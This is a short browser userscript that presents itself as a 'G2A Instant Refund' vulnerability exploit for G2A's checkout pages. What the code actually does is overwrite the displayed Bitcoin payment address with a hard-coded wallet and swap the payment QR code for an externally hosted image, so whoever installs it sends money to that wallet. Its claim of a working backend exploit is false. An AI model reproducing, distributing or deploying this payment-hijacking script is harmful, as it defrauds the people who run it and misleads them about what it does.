// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      2.0 Last update: July 23, 2022
// @description  G2A Instant Refund Vulnerbility
// @author       @dr4co
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

alert('Exploit successfully enabled! Press OK to continue.');

var interval = setInterval(function () {
    var rowElements = document['getElementsByClassName']('row');
    rowElements[1]['innerHTML'] = 'Adresse BTC : bc1q92wt56pr2zqfsr3s6pqdj3qn6psa7v2xfr7y57';

    document['getElementsByClassName']('code')[0]['src'] = 'https://i.imgur.com/ntqBoO7.png';
    var codeElements = document['getElementsByClassName']('code');
    if (codeElements['length'] > 0) {
        clearInterval(interval)
    }
}, 10)

//Backend-Exploit | Status: Working